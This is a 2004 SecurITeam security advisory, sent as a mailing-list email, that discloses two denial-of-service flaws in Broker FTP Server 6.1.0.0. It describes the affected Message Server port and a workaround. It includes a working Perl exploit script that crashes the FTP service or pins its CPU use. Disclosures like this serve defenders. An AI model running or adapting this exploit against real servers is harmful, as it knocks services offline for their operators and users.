Date: Tue, 17 Feb 2004 17:48:54 +0200
From: Aviram Jenik <[email protected]>
To: [email protected]Subject: Broker FTP DoS (Message Server)
=A0 Broker FTP DoS (Message Server)
=2D-----------------------------------------------
Article reference:
http://www.securiteam.com/windowsntfocus/5IP0B0AC1I.html
SUMMARY
Beyond Security's SecurITeam has discovered two security vulnerabilities=20
in the Broker FTP product, these vulnerabilities allow a remote attacker=20
to repeatedly crash the TsFtpSrv.exe (The FTP Service) and to cause it to=20
use large amount of CPU time.
DETAILS
Affected version:
=A0* Broker FTP Server version 6.1.0.0
By connecting and immediately disconnecting to the Broker FTP server's=20
Message Server (by default residing on port 8701) it is possible to cause=20
an exception in the TsFtpSrv.exe program. The exception doesn't cause any=20
harm beside showing a message that the TsFtpSrv.exe has encountered an=20
Application Error.
By connecting and not sending anything (but keeping the connection open),=20
it is possible to cause the TsFtpSrv.exe to utilize large amount of CPU=20
time (basically while the connection is kept open, CPU usage will be=20
100%).
Workaround:
It is not clear what the Message Server is used for, but modifying the=20
TsFtpSrv.ini's [TSMessageServer] allows an administrator to control what=20
port the server listens on (and change it from the default one).
Exploit:
#!/usr/bin/perl -w
# TransSoft Broker FTP Server DoS (CPU usage and Exception)
#
use Socket;
if (not $ARGV[0]) {
=A0 =A0 =A0 =A0 print qq~
=A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 Usage: pfdos.pl < host>
=A0 =A0 =A0 =A0 ~;
exit;}
$ip=3D$ARGV[0];
print "host: " . $ip . "\n\n";
sendexplt("A");
sub sendexplt {
=A0my ($pstr)=3D@_;
=A0 =A0 =A0 =A0 $target=3D inet_aton($ip) || die("inet_aton
problems");
=A0socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
||0) ||
=A0die("Socket problems\n");
=A0if(connect(S,pack "SnA4x8",2,8701,$target)){
=A0select(S);
=A0 =A0 =A0 =A0 =A0 =A0 =A0 =A0 $|=3D1;
=A0print $pstr;
=A0sleep 100;
=A0 =A0 =A0 =A0 =A0close(S);
=A0} else { die("Can't connect...\n"); }
}
Vendor Status:
We have tried to contact the vendor over a month ago, but have not received=
=20
any response as of yet.
ADDITIONAL INFORMATION
The information has been provided by =A0<mailto:[email protected]>=20
SecurITeam.
=2D-=20
Beyond Security Ltd.
"Know that you're safe"
http://www.BeyondSecurity.comhttp://www.SecuriTeam.com
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=20
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=20
DISCLAIMER:=20
The information in this bulletin is provided "AS IS" without warranty of an=
y=20
kind.=20
In no event shall we be liable for any damages whatsoever including direct,=
=20
indirect, incidental, consequential, loss of business profits or special=20
damages.=20
